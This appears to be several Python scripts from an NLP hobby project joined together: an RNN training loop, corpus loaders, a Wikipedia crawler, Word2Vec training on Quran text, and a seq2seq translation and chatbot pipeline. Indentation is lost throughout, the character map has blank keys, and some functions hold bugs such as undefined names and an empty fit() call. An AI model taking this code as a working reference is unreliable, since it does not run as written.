# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except:
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
form = "{days}d " + form
if months:
form = "{months}m " + form
elif years:
form = "{years}y " + form
return form.format(**locals())
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
model.fit()
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
# Specify the width and height of a single thumbnail.
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model as word2evc format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except:
print("Please provice model path and output path")
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '.' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# cap to remove _unk_ samples
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# remove much unks on a single sample
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:params train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if its char level, one-hot all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if its word level, one-hot only target_data ( the one compared with dense )
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], output=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=61)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or find stop token.
if (output_tokens == '<PAD>' or len(decoded_sentence) > 50):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1,1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sentence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
print(gen.X.shape)
print(gen.y.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
